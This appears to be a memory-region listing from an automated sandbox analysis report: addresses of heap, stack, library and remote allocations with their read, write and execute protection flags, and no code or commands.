heap
page read and write
C30BDCE000
stack
page read and write
16D0000
heap
page read and write
C30B27E000
stack
page read and write
1A90000
heap
page execute and read and write
28E45318000
heap
page read and write
D1C000
heap
page read and write
7FF848EA0000
trusted library allocation
page execute and read and write
28E2D093000
trusted library allocation
page read and write
2D2AACB2000
trusted library allocation
page read and write
F02000
trusted library allocation
page execute and read and write
24429A16000
trusted library allocation
page read and write
235C690A000
heap
page read and write
211E2D97000
heap
page read and write
2D2C2A87000
heap
page read and write
2D2AA7E1000
trusted library allocation
page read and write
4C8D000
trusted library allocation
page read and write
343D000
stack
page read and write
4ECF000
stack
page read and write
219E5762000
heap
page read and write
219E616D000
heap
page read and write
219E57CA000
heap
page read and write
261C47F0000
heap
page read and write
C30AF7E000
stack
page read and write
211E3000000
heap
page read and write
1F42A583000
trusted library allocation
page read and write
1EC2846F000
heap
page read and write
A00000
trusted library allocation
page read and write
235C68C0000
heap
page read and write
1EC284B2000
heap
page read and write
10F0000
heap
page read and write
1F4CB714000
heap
page read and write
219E57CD000
heap
page read and write
2E81000
trusted library allocation
page read and write
219E6198000
heap
page read and write
219E4C35000
trusted library allocation
page read and write
2870000
trusted library allocation
page read and write
235C1E50000
trusted library allocation
page read and write
1702000
trusted library allocation
page execute and read and write
3D31000
trusted library allocation
page read and write
67E0000
trusted library allocation
page execute and read and write
1EC2843E000
heap
page read and write
169D000
trusted library allocation
page execute and read and write
A13000
trusted library allocation
page execute and read and write
1EC28280000
heap
page read and write
8B0000
heap
page read and write
219E4D20000
trusted library allocation
page execute
A47000
trusted library allocation
page execute and read and write
C30BF0E000
stack
page read and write
2D2A8AB0000
heap
page read and write
1F42A5B4000
heap
page read and write
2441AD0E000
trusted library allocation
page read and write
1F42B290000
heap
page read and write
A88000
heap
page read and write
24415F90000
heap
page read and write
235C128F000
heap
page read and write
1FCCD480000
heap
page read and write
2A17000
trusted library allocation
page read and write
219E6172000
heap
page read and write
170A000
trusted library allocation
page execute and read and write
261C4AB6000
heap
page read and write
219E57C1000
heap
page read and write
211E2CE0000
trusted library allocation
page read and write
219E57D4000
heap
page read and write
E440CBA000
stack
page read and write
3461000
trusted library allocation
page read and write
235C21F0000
trusted library section
page readonly
235C6902000
heap
page read and write
1F42A5B9000
heap
page read and write
1EC2848A000
heap
page read and write
219E6198000
heap
page read and write
147D000
remote allocation
page execute and read and write
1F4CB714000
heap
page read and write
1535000
heap
page read and write
76258FC000
stack
page read and write
2D2A8990000
heap
page readonly
174B000
heap
page read and write
219E61C5000
heap
page read and write
7FF8490B0000
trusted library allocation
page read and write
7FF848FA0000
trusted library allocation
page execute and read and write
4EF0000
heap
page execute and read and write
28E2B310000
heap
page read and write
219E5770000
heap
page read and write
7FF849070000
trusted library allocation
page read and write
2441ACF0000
trusted library allocation
page read and write
28E2DAF4000
trusted library allocation
page read and write
DB6F6BC000
stack
page read and write
8694D7E000
stack
page read and write
219E619A000
heap
page read and write
D00000
heap
page read and write
1EC28424000
heap
page read and write
219E5787000
heap
page read and write
28E2CF90000
heap
page execute and read and write
2D2C2860000
heap
page read and write
28E2DA76000
trusted library allocation
page read and write
F4B000
trusted library allocation
page execute and read and write
2D2A88AE000
heap
page read and write
211E2CF0000
trusted library allocation
page read and write
2D2A8857000
heap
page read and write
2D2C29E0000
heap
page read and write
E44087D000
stack
page read and write
1EC2847F000
heap
page read and write
235C2210000
trusted library section
page readonly
C30AFFD000
stack
page read and write
244291C0000
trusted library allocation
page read and write
86959FE000
unkown
page readonly
28E2D37E000
trusted library allocation
page read and write
219E4C33000
trusted library allocation
page read and write
7FF849020000
trusted library allocation
page read and write
211E47D0000
heap
page readonly
28E2CFFD000
trusted library allocation
page read and write
1F4CB491000
heap
page read and write
28E2B315000
heap
page read and write
7FF848FF0000
trusted library allocation
page execute and read and write
211E2DBD000
heap
page read and write
29EE000
stack
page read and write
54A6000
trusted library allocation
page read and write
8693DFE000
unkown
page readonly
219E57DD000
heap
page read and write
219E9D52000
trusted library allocation
page read and write
CC6000
heap
page read and write
76259FE000
stack
page read and write
869537E000
unkown
page readonly
A3A000
trusted library allocation
page execute and read and write
1EC283D7000
heap
page read and write
219E57DB000
heap
page read and write
235C6790000
remote allocation
page read and write
7625DFC000
stack
page read and write
3E81000
trusted library allocation
page read and write
DB7008E000
stack
page read and write
1F42A039000
heap
page read and write
28E45138000
heap
page read and write
7FF8490E0000
trusted library allocation
page read and write
2D2A8896000
heap
page read and write
24416078000
heap
page read and write
219E5770000
heap
page read and write
3947000
trusted library allocation
page read and write
219E617F000
heap
page read and write
D08000
heap
page read and write
1EC2844E000
heap
page read and write
235C1294000
heap
page read and write
219E6150000
heap
page read and write
2D2A888E000
heap
page read and write
DB6F438000
stack
page read and write
1010000
heap
page read and write
37C1000
trusted library allocation
page read and write
219E6187000
heap
page read and write
24417E40000
heap
page read and write
2D2C2870000
heap
page read and write
7FF849100000
trusted library allocation
page read and write
219E57CD000
heap
page read and write
2D2AAC8A000
trusted library allocation
page read and write
1F42A58B000
trusted library allocation
page read and write
219E4CC8000
trusted library allocation
page read and write
2D2A889C000
heap
page read and write
B36000
stack
page read and write
211E2DB6000
heap
page read and write
B39000
stack
page read and write
DB7030B000
stack
page read and write
219E61AB000
heap
page read and write
9719B4C000
stack
page read and write
F47000
trusted library allocation
page execute and read and write
8694CFE000
unkown
page readonly
219E576B000
heap
page read and write
E440EBD000
stack
page read and write
211E2DBD000
heap
page read and write
244161E0000
heap
page read and write
1F42A5B3000
heap
page read and write
235C68F4000
heap
page read and write
4D1C000
stack
page read and write
1730000
heap
page read and write
261C6260000
heap
page read and write
219E57C1000
heap
page read and write
1EC28474000
heap
page read and write
E441C0A000
stack
page read and write
1EC2848A000
heap
page read and write
7CB000
stack
page read and write
219E4CC0000
trusted library allocation
page read and write
219E57C8000
heap
page read and write
28E2DAEC000
trusted library allocation
page read and write
D96000
heap
page read and write
7FF848EDC000
trusted library allocation
page execute and read and write
C30B079000
stack
page read and write
7FF849120000
trusted library allocation
page read and write
A23000
trusted library allocation
page read and write
521E000
stack
page read and write
219E6157000
heap
page read and write
500E000
stack
page read and write
105E000
stack
page read and write
2D2A88D5000
heap
page read and write
9719E9E000
stack
page read and write
FB0000
trusted library allocation
page read and write
16E0000
trusted library allocation
page read and write
219E5754000
heap
page read and write
7FF8490D0000
trusted library allocation
page read and write
24418187000
trusted library allocation
page read and write
211E47E4000
heap
page read and write
2D2BA7F0000
trusted library allocation
page read and write
219E61A3000
heap
page read and write
2441C082000
trusted library allocation
page read and write
28E2AFC0000
heap
page read and write
9CF000
stack
page read and write
54A4000
trusted library allocation
page read and write
AB7000
heap
page read and write
2D2AA617000
heap
page execute and read and write
211E2DB2000
heap
page read and write
1EC2843F000
heap
page read and write
1F4CB478000
heap
page read and write
F32000
trusted library allocation
page execute and read and write
1F4CB492000
heap
page read and write
7FF8490A0000
trusted library allocation
page read and write
678B000
trusted library allocation
page read and write
219E4D50000
heap
page read and write
211E2E16000
heap
page read and write
29C5000
trusted library allocation
page read and write
89E000
stack
page read and write
86949FE000
unkown
page readonly
C30A9CF000
stack
page read and write
235C6730000
trusted library allocation
page read and write
97194F3000
stack
page read and write
7FF849070000
trusted library allocation
page read and write
2D2AB29C000
trusted library allocation
page read and write
2804000
trusted library allocation
page read and write
2A21000
trusted library allocation
page read and write
16CB000
trusted library allocation
page execute and read and write
235C65E0000
trusted library allocation
page read and write
7FF848F40000
trusted library allocation
page execute and read and write
DB6F53E000
stack
page read and write
219E5770000
heap
page read and write
2D2AA5D0000
heap
page execute and read and write
8693FFE000
stack
page read and write
7FF848E30000
trusted library allocation
page read and write
235C2200000
trusted library section
page readonly
211E2D50000
heap
page read and write
219E4C3B000
trusted library allocation
page read and write
24417DC0000
heap
page readonly
E441A8A000
stack
page read and write
219E57BA000
heap
page read and write
219E57C2000
heap
page read and write
219E6153000
heap
page read and write
235C191A000
heap
page read and write
219E57CC000
heap
page read and write
7FF848DF0000
trusted library allocation
page read and write
219E6194000
heap
page read and write
219E6161000
heap
page read and write
69D0000
heap
page read and write
2D31000
trusted library allocation
page read and write
28E2D0E1000
trusted library allocation
page read and write
1F42A720000
heap
page readonly
1A1F000
stack
page read and write
1F4CB47E000
heap
page read and write
211E2D78000
heap
page read and write
2D2AA8E7000
trusted library allocation
page read and write
CDB000
heap
page read and write
1EC2848A000
heap
page read and write
219E61A3000
heap
page read and write
1EC2844E000
heap
page read and write
1FCCD234000
heap
page read and write
7FF848F82000
trusted library allocation
page read and write
2D2AA865000
trusted library allocation
page read and write
219E6173000
heap
page read and write
A2D000
trusted library allocation
page execute and read and write
2D2A8820000
heap
page read and write
219E61C3000
heap
page read and write
2441610E000
heap
page read and write
7FF848EE0000
trusted library allocation
page execute and read and write
1A70000
trusted library allocation
page read and write
219E6180000
heap
page read and write
127B000
stack
page read and write
24417A40000
trusted library section
page read and write
235C690A000
heap
page read and write
219E5772000
heap
page read and write
1EC28464000
heap
page read and write
672C000
trusted library allocation
page read and write
1320000
heap
page execute and read and write
235C1277000
heap
page read and write
219E5750000
heap
page read and write
C30BF8F000
stack
page read and write
1EC2844E000
heap
page read and write
219E615C000
heap
page read and write
219E5787000
heap
page read and write
549E000
stack
page read and write
7FF848F91000
trusted library allocation
page read and write
219E619C000
heap
page read and write
235C12BC000
heap
page read and write
219E61C3000
heap
page read and write
235C68D7000
heap
page read and write
DCB000
stack
page read and write
7FF848FB0000
trusted library allocation
page execute and read and write
E10000
trusted library allocation
page read and write
DB6F63C000
stack
page read and write
FC2000
trusted library allocation
page execute and read and write
86947FE000
unkown
page readonly
261C4958000
heap
page read and write
1F42A58D000
trusted library allocation
page read and write
4D30000
trusted library allocation
page execute and read and write
7FF849080000
trusted library allocation
page read and write
3450000
heap
page read and write
E440A7E000
stack
page read and write
28E2D0A8000
trusted library allocation
page read and write
147B000
remote allocation
page execute and read and write
7FF8490C0000
trusted library allocation
page read and write
4C5E000
trusted library allocation
page read and write
1EC28480000
heap
page read and write
A1D000
trusted library allocation
page execute and read and write
1EC286CE000
heap
page read and write
219E6360000
heap
page read and write
4F0E000
stack
page read and write
16B7000
trusted library allocation
page execute and read and write
E4409FE000
stack
page read and write
2D2AB2F4000
trusted library allocation
page read and write
235C1913000
heap
page read and write
2D2C280D000
heap
page read and write
DB6F57F000
stack
page read and write
24417F23000
heap
page read and write
2D2A8960000
trusted library allocation
page read and write
28E2D474000
trusted library allocation
page read and write
2D2C29E8000
heap
page read and write
4DF0000
heap
page read and write
2D2C2A7C000
heap
page read and write
657E000
stack
page read and write
653F000
stack
page read and write
219E57C2000
heap
page read and write
1EC28481000
heap
page read and write
AAB000
heap
page read and write
637E000
stack
page read and write
C60000
heap
page read and write
235C6790000
remote allocation
page read and write
A70000
trusted library allocation
page execute and read and write
2D2C2A16000
heap
page read and write
7FF848DE3000
trusted library allocation
page execute and read and write
261C4952000
heap
page read and write
75465FF000
stack
page read and write
64FD000
stack
page read and write
235C1213000
heap
page read and write
6760000
heap
page read and write
235C1302000
heap
page read and write
28E3CFB1000
trusted library allocation
page read and write
381A000
trusted library allocation
page read and write
16C0000
trusted library allocation
page read and write
24416070000
heap
page read and write
58E5000
trusted library allocation
page read and write
1F42A041000
heap
page read and write
7FF848E9C000
trusted library allocation
page execute and read and write
DB6F17E000
stack
page read and write
69AE000
stack
page read and write
1FCCD247000
heap
page read and write
509C000
stack
page read and write
1F4CB420000
trusted library allocation
page read and write
1F42A6B5000
trusted library allocation
page read and write
10EE000
stack
page read and write
1720000
heap
page read and write
2D2AA83E000
trusted library allocation
page read and write
7625AFF000
stack
page read and write
1EC28480000
heap
page read and write
C30C10A000
stack
page read and write
24427F61000
trusted library allocation
page read and write
1EC28360000
heap
page read and write
7FF849002000
trusted library allocation
page read and write
2D2AB27D000
trusted library allocation
page read and write
C30B2FE000
stack
page read and write
2442AF4F000
trusted library allocation
page read and write
7FF849090000
trusted library allocation
page read and write
F60000
heap
page read and write
1FCCD249000
heap
page read and write
E440F3E000
stack
page read and write
2D2C2804000
heap
page read and write
211E4639000
heap
page read and write
8A0000
heap
page read and write
8695FFE000
unkown
page readonly
211E2E39000
heap
page read and write
25E8000
trusted library allocation
page read and write
1F4CB71E000
heap
page read and write
261C4A90000
heap
page read and write
2D2AB292000
trusted library allocation
page read and write
2D2AA928000
trusted library allocation
page read and write
235C6750000
trusted library allocation
page read and write
1757000
trusted library allocation
page execute and read and write
C98000
heap
page read and write
1EC286C0000
heap
page read and write
164E000
stack
page read and write
1F4CB71D000
heap
page read and write
28E2B200000
heap
page read and write
555E000
stack
page read and write
219E57A7000
heap
page read and write
24417F61000
trusted library allocation
page read and write
67F0000
trusted library allocation
page read and write
219E61B3000
heap
page read and write
6700000
trusted library allocation
page execute and read and write
24416111000
heap
page read and write
24416157000
heap
page read and write
5680000
heap
page read and write
A4B000
trusted library allocation
page execute and read and write
1F4CB45F000
heap
page read and write
1F42A5BC000
heap
page read and write
1EC2846F000
heap
page read and write
1F42A160000
heap
page read and write
7FF8490F0000
trusted library allocation
page read and write
C30B37C000
stack
page read and write
235C65D0000
trusted library allocation
page read and write
219E57DD000
heap
page read and write
1F42A5A0000
heap
page read and write
1F42A6A5000
trusted library allocation
page read and write
7FF849010000
trusted library allocation
page read and write
75467FE000
stack
page read and write
235C6884000
heap
page read and write
E440D39000
stack
page read and write
10F6000
stack
page read and write
6770000
trusted library allocation
page execute and read and write
1B40000
trusted library allocation
page execute and read and write
1EC2846F000
heap
page read and write
1FCCD670000
heap
page read and write
1308000
heap
page read and write
C30AC72000
stack
page read and write
211E2E38000
heap
page read and write
24417E50000
heap
page read and write
261C6277000
heap
page read and write
14B0000
heap
page read and write
10F9000
stack
page read and write
148E000
stack
page read and write
219E61B5000
heap
page read and write
7FF849150000
trusted library allocation
page read and write
2D2AA8E1000
trusted library allocation
page read and write
219E57D4000
heap
page read and write
1710000
trusted library allocation
page execute and read and write
1F42A6BF000
trusted library allocation
page read and write
219E61B3000
heap
page read and write
219E57BA000
heap
page read and write
75464F8000
stack
page read and write
7FF848E3B000
trusted library allocation
page read and write
A32000
trusted library allocation
page read and write
1F42A5AA000
heap
page read and write
BCC000
remote allocation
page execute and read and write
16A3000
trusted library allocation
page read and write
1220000
heap
page read and write
13B0000
remote allocation
page execute and read and write
219E57C1000
heap
page read and write
1EC28410000
heap
page read and write
1F4CB458000
heap
page read and write
235C6570000
trusted library allocation
page read and write
EF0000
trusted library allocation
page read and write
1EC28680000
trusted library allocation
page read and write
E440B78000
stack
page read and write
28E4513A000
heap
page read and write
2D2AA7F7000
trusted library allocation
page read and write
219E4F50000
trusted library allocation
page read and write
24429281000
trusted library allocation
page read and write
235C65F0000
trusted library allocation
page read and write
37D9000
trusted library allocation
page read and write
28E2CFA1000
trusted library allocation
page read and write
3442000
trusted library allocation
page read and write
24417A50000
trusted library section
page read and write
28E2B176000
heap
page read and write
7FF849080000
trusted library allocation
page read and write
DE5000
heap
page read and write
9719C4F000
stack
page read and write
28E2D0E7000
trusted library allocation
page read and write
54BE3A8000
stack
page read and write
1693000
trusted library allocation
page execute and read and write
28E2B0F0000
heap
page read and write
DB6EE72000
stack
page read and write
176E000
heap
page read and write
97195FE000
stack
page read and write
28E2DACA000
trusted library allocation
page read and write
219E61AF000
heap
page read and write
4D43000
heap
page read and write
269C6914000
heap
page read and write
16BA000
trusted library allocation
page execute and read and write
106F000
stack
page read and write
5050000
heap
page read and write
219E576B000
heap
page read and write
219E4C3D000
trusted library allocation
page read and write
24416117000
heap
page read and write
4C61000
trusted library allocation
page read and write
211E2DB4000
heap
page read and write
B5D000
heap
page read and write
28E45324000
heap
page read and write
28E452B0000
heap
page read and write
1712000
trusted library allocation
page execute and read and write
CBE000
stack
page read and write
235C12AF000
heap
page read and write
CF0000
trusted library allocation
page read and write
535E000
stack
page read and write
86945FB000
stack
page read and write
235C6630000
trusted library allocation
page read and write
2D2C2813000
heap
page read and write
2874000
trusted library allocation
page read and write
E441B8D000
stack
page read and write
211E300D000
heap
page read and write
235C66C0000
trusted library allocation
page read and write
28E2D448000
trusted library allocation
page read and write
1F4CB474000
heap
page read and write
261C48D0000
heap
page read and write
134C000
heap
page read and write
DD0000
heap
page read and write
A80000
heap
page read and write
2D2C281C000
heap
page read and write
1EC28433000
heap
page read and write
5E6A000
heap
page read and write
869477E000
stack
page read and write
7FF8490D0000
trusted library allocation
page read and write
219E57BE000
heap
page read and write
1300000
heap
page read and write
2442ADA2000
trusted library allocation
page read and write
211E2DBD000
heap
page read and write
24417DD0000
trusted library section
page read and write
6790000
trusted library allocation
page execute and read and write
1F42A03E000
heap
page read and write
28E2B12E000
heap
page read and write
28E2DA36000
trusted library allocation
page read and write
7FF849120000
trusted library allocation
page read and write
235C128D000
heap
page read and write
50DE000
stack
page read and write
7FF849050000
trusted library allocation
page read and write
559E000
stack
page read and write
28E2CF36000
heap
page execute and read and write
1758000
heap
page read and write
1EC28464000
heap
page read and write
235C127B000
heap
page read and write
86950FE000
unkown
page readonly
261C4AB0000
heap
page read and write
47EC000
stack
page read and write
8694E7E000
stack
page read and write
28E2B0A0000
heap
page read and write
2D2C2A94000
heap
page read and write
24417F50000
heap
page execute and read and write
28E2B285000
heap
page read and write
1EC2848A000
heap
page read and write
DB6EF7E000
stack
page read and write
7FF849000000
trusted library allocation
page read and write
1728000
heap
page read and write
2D2AB2EC000
trusted library allocation
page read and write
1F42B170000
heap
page read and write
1FCCD230000
heap
page read and write
7FF849170000
trusted library allocation
page read and write
235C66C0000
trusted library allocation
page read and write
2441A987000
trusted library allocation
page read and write
86940FE000
unkown
page readonly
1EC28435000
heap
page read and write
CD0000
heap
page read and write
67D0000
trusted library allocation
page execute and read and write
869527E000
stack
page read and write
2D2A87C0000
heap
page read and write
A3B000
stack
page read and write
2D2AB2A0000
trusted library allocation
page read and write
24417ED8000
heap
page read and write
2D2AB294000
trusted library allocation
page read and write
2812000
trusted library allocation
page read and write
1FCCD430000
heap
page read and write
219E57D4000
heap
page read and write
4C4B000
trusted library allocation
page read and write
235C6800000
heap
page read and write
235C17A0000
trusted library allocation
page read and write
CED000
heap
page read and write
1EC284C5000
heap
page read and write
28E2DA7A000
trusted library allocation
page read and write
244161E5000
heap
page read and write
235C1030000
heap
page read and write
244287F0000
trusted library allocation
page read and write
2D2C28D8000
heap
page read and write
5690000
trusted library allocation
page read and write
235C1FC1000
trusted library allocation
page read and write
28E455B0000
heap
page read and write
688E000
stack
page read and write
1200000
heap
page read and write
219E4D54000
heap
page read and write
235C68C4000
heap
page read and write
2441611B000
heap
page read and write
2D2A86E0000
heap
page read and write
7FF849060000
trusted library allocation
page read and write
DB6F4BE000
stack
page read and write
1EC28424000
heap
page read and write
8693CF7000
stack
page read and write
24417EF7000
heap
page read and write
1EC283D0000
heap
page read and write
7FF849130000
trusted library allocation
page read and write
2D53000
trusted library allocation
page read and write
219E57C1000
heap
page read and write
175B000
trusted library allocation
page execute and read and write
6890000
trusted library allocation
page read and write
67A0000
trusted library allocation
page execute and read and write
2D2BA855000
trusted library allocation
page read and write
86951FE000
stack
page read and write
235C129F000
heap
page read and write
C30B1FE000
stack
page read and write
244161F0000
heap
page read and write
A2C000
trusted library allocation
page read and write
235C1200000
heap
page read and write
2D2C2900000
heap
page read and write
DB6F2BE000
stack
page read and write
1EC28417000
heap
page read and write
86946FE000
unkown
page readonly
24419F87000
trusted library allocation
page read and write
28E2CE80000
heap
page read and write
261C4A50000
trusted library allocation
page read and write
24427FD2000
trusted library allocation
page read and write
24416190000
heap
page read and write
168E000
stack
page read and write
4D20000
heap
page read and write
7FF849030000
trusted library allocation
page read and write
235C681D000
heap
page read and write
219E61C5000
heap
page read and write
191E000
stack
page read and write
24417FE7000
trusted library allocation
page read and write
2D2AB25A000
trusted library allocation
page read and write
269C6910000
heap
page read and write
2D2AA92E000
trusted library allocation
page read and write
A30000
trusted library allocation
page read and write
28E2CFE7000
trusted library allocation
page read and write
86958FB000
stack
page read and write
1762000
heap
page read and write
219E61AF000
heap
page read and write
28E2DAC7000
trusted library allocation
page read and write
235C122B000
heap
page read and write
219E6152000
heap
page read and write
219E57DD000
heap
page read and write
1744000
heap
page read and write
4C46000
trusted library allocation
page read and write
24417E89000
heap
page read and write
6710000
trusted library allocation
page read and write
E44198E000
stack
page read and write
211E2E16000
heap
page read and write
2441AD08000
trusted library allocation
page read and write
75466FF000
stack
page read and write
531F000
stack
page read and write
219E5787000
heap
page read and write
219E5762000
heap
page read and write
54BE7FE000
stack
page read and write
1334000
heap
page read and write
7FF848FC0000
trusted library allocation
page read and write
2441612F000
heap
page read and write
219E57C2000
heap
page read and write
24417DB0000
trusted library allocation
page read and write
219E57A7000
heap
page read and write
219E615B000
heap
page read and write
2D2C2A89000
heap
page read and write
2441B70E000
trusted library allocation
page read and write
64BE000
stack
page read and write
86955FE000
unkown
page readonly
7FF848ED6000
trusted library allocation
page read and write
7FF849130000
trusted library allocation
page read and write
C5E000
stack
page read and write
261C48F0000
heap
page read and write
5E3F000
heap
page read and write
501E000
stack
page read and write
261C495E000
heap
page read and write
7FF8490B0000
trusted library allocation
page read and write
28E3CFA1000
trusted library allocation
page read and write
235C1110000
heap
page read and write
28E2CF30000
heap
page execute and read and write
280E000
trusted library allocation
page read and write
C30AE7D000
stack
page read and write
DB7018D000
stack
page read and write
33FF000
stack
page read and write
C30AD7F000
stack
page read and write
219E619A000
heap
page read and write
869487E000
stack
page read and write
86957FE000
unkown
page readonly
211E3006000
heap
page read and write
235C68BE000
heap
page read and write
1F42A5BD000
heap
page read and write
1F4CB3A0000
heap
page read and write
211E2D78000
heap
page read and write
1EC28479000
heap
page read and write
219E6194000
heap
page read and write
4C6D000
trusted library allocation
page read and write
C30ADFE000
stack
page read and write
C90000
heap
page read and write
219E61B9000
heap
page read and write
261C6277000
heap
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
C10000
heap
page read and write
2A3F000
stack
page read and write
235C65F1000
trusted library allocation
page read and write
235C21D0000
trusted library section
page readonly
211E2C60000
heap
page read and write
7FF848F06000
trusted library allocation
page execute and read and write
269C6870000
heap
page read and write
235C1902000
heap
page read and write
2A1F000
trusted library allocation
page read and write
A14000
trusted library allocation
page read and write
2A15000
trusted library allocation
page read and write
219E61C5000
heap
page read and write
219E6191000
heap
page read and write
16B0000
trusted library allocation
page read and write
605E000
stack
page read and write
219E6159000
heap
page read and write
24417E92000
heap
page read and write
1EC2841A000
heap
page read and write
28E2B300000
trusted library allocation
page read and write
28E2B260000
trusted library allocation
page read and write
667F000
stack
page read and write
28E2DA42000
trusted library allocation
page read and write
1694000
trusted library allocation
page read and write
DB7020F000
stack
page read and write
28E2D0AB000
trusted library allocation
page read and write
1EC283C4000
heap
page read and write
6090000
trusted library allocation
page read and write
219E57C4000
heap
page read and write
28E2DA7E000
trusted library allocation
page read and write
2D2A87E0000
heap
page read and write
235C7000000
heap
page read and write
DB6EFFF000
stack
page read and write
5EB6000
heap
page read and write
219E4C39000
trusted library allocation
page read and write
211E4637000
heap
page read and write
219E616D000
heap
page read and write
1EC283CD000
heap
page read and write
2B3F000
stack
page read and write
8694C7E000
stack
page read and write
219E61C3000
heap
page read and write
219E57BE000
heap
page read and write
7FF848E22000
trusted library allocation
page read and write
235C65F0000
trusted library allocation
page read and write
1B50000
heap
page read and write
2D2AB318000
trusted library allocation
page read and write
76253FF000
stack
page read and write
7FF849060000
trusted library allocation
page read and write
2D2A89C5000
heap
page read and write
219E61B0000
heap
page read and write
86948FE000
unkown
page readonly
2D2AB2A4000
trusted library allocation
page read and write
235C1815000
heap
page read and write
1EC283F7000
heap
page read and write
219E57BA000
heap
page read and write
219E57C9000
heap
page read and write
24429E75000
trusted library allocation
page read and write
235C21C0000
trusted library section
page readonly
261C627B000
heap
page read and write
E44077E000
stack
page read and write
2D2AA920000
trusted library allocation
page read and write
1790000
heap
page execute and read and write
1EC28477000
heap
page read and write
4C72000
trusted library allocation
page read and write
28E2CFD3000
trusted library allocation
page read and write
1F42A5AA000
heap
page read and write
CE0000
heap
page execute and read and write
261C4930000
heap
page read and write
3446000
trusted library allocation
page read and write
211E4620000
heap
page read and write
1110000
heap
page execute and read and write
2D2AA8D7000
trusted library allocation
page read and write
219E6161000
heap
page read and write
235C66D0000
trusted library allocation
page read and write
9719A4E000
stack
page read and write
235C12A5000
heap
page read and write
235C6660000
trusted library allocation
page read and write
235C1243000
heap
page read and write
261C63F4000
heap
page read and write
2D2AB2E8000
trusted library allocation
page read and write
28E2CFBB000
trusted library allocation
page read and write
DB6F07D000
stack
page read and write
211E2D57000
heap
page read and write
219E57A7000
heap
page read and write
4461000
trusted library allocation
page read and write
1EC28474000
heap
page read and write
1EC28432000
heap
page read and write
29D6000
trusted library allocation
page read and write
1F4CB450000
heap
page read and write
1F42A5B9000
heap
page read and write
C60000
heap
page read and write
2D2A89A0000
trusted library allocation
page read and write
8695F7E000
stack
page read and write
5900000
trusted library allocation
page read and write
5DE0000
heap
page read and write
DB6F1FD000
stack
page read and write
54AA000
trusted library allocation
page read and write
219E619C000
heap
page read and write
219E5770000
heap
page read and write
219E616D000
heap
page read and write
2A09000
trusted library allocation
page read and write
1742000
trusted library allocation
page execute and read and write
1EC286C6000
heap
page read and write
545E000
stack
page read and write
4C4E000
trusted library allocation
page read and write
7FF848E90000
trusted library allocation
page read and write
1EC2848A000
heap
page read and write
27FB000
trusted library allocation
page read and write
1EC28473000
heap
page read and write
7FF849040000
trusted library allocation
page read and write
AF9000
stack
page read and write
24429A10000
trusted library allocation
page read and write
1F4CB390000
heap
page read and write
E441A0B000
stack
page read and write
C30B178000
stack
page read and write
6730000
trusted library allocation
page read and write
219E4CC5000
trusted library allocation
page read and write
D90000
heap
page read and write
51DE000
stack
page read and write
58A0000
trusted library allocation
page read and write
7FF849160000
trusted library allocation
page read and write
1EC28410000
heap
page read and write
16F0000
heap
page read and write
1EC28432000
heap
page read and write
1F42A585000
trusted library allocation
page read and write
261C496F000
heap
page read and write
211E47ED000
heap
page read and write
7625FFE000
stack
page read and write
2A1B000
trusted library allocation
page read and write
16C7000
trusted library allocation
page execute and read and write
2696000
trusted library allocation
page read and write
261C6279000
heap
page read and write
1EC286CB000
heap
page read and write
28E3CFEB000
trusted library allocation
page read and write
1F42A037000
heap
page read and write
1F42A020000
heap
page read and write
16BF000
stack
page read and write
235C6610000
trusted library allocation
page read and write
7FF848DED000
trusted library allocation
page execute and read and write
235C682A000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
261C63FD000
heap
page read and write
7FF8490A0000
trusted library allocation
page read and write
8694BFE000
unkown
page readonly
24417F2C000
heap
page read and write
219E4CD5000
trusted library allocation
page read and write
1A5E000
stack
page read and write
7FF849110000
trusted library allocation
page read and write
1007000
trusted library allocation
page execute and read and write
219E5787000
heap
page read and write
7FF848E2D000
trusted library allocation
page execute and read and write
6740000
trusted library allocation
page read and write
7FF848ED0000
trusted library allocation
page read and write
2442B4E8000
trusted library allocation
page read and write
219E6161000
heap
page read and write
28E2B280000
heap
page read and write
1FCCD247000
heap
page read and write
2806000
trusted library allocation
page read and write
2441BFB1000
trusted library allocation
page read and write
219E61B3000
heap
page read and write
1520000
trusted library allocation
page read and write
C30B3FC000
stack
page read and write
2680000
trusted library allocation
page execute and read and write
4C66000
trusted library allocation
page read and write
2D2AA82B000
trusted library allocation
page read and write
1F4CB740000
heap
page read and write
235C6630000
trusted library allocation
page read and write
DB7010E000
stack
page read and write
4CB0000
trusted library allocation
page read and write
869507E000
stack
page read and write
BD2000
remote allocation
page execute and read and write
E441B0B000
stack
page read and write
235C1010000
heap
page read and write
219E57BE000
heap
page read and write
67B0000
trusted library allocation
page execute and read and write
219E61BE000
heap
page read and write
235C195A000
heap
page read and write
CB0000
heap
page read and write
244291CE000
trusted library allocation
page read and write
2D2AA821000
trusted library allocation
page read and write
28E2DA6B000
trusted library allocation
page read and write
211E2DB6000
heap
page read and write
1F4CB710000
heap
page read and write
4D40000
heap
page read and write
F12000
trusted library allocation
page execute and read and write
6780000
trusted library allocation
page read and write
2D2AA7D0000
heap
page execute and read and write
28E2DA55000
trusted library allocation
page read and write
There are 1201 hidden memdumps, click here to show them.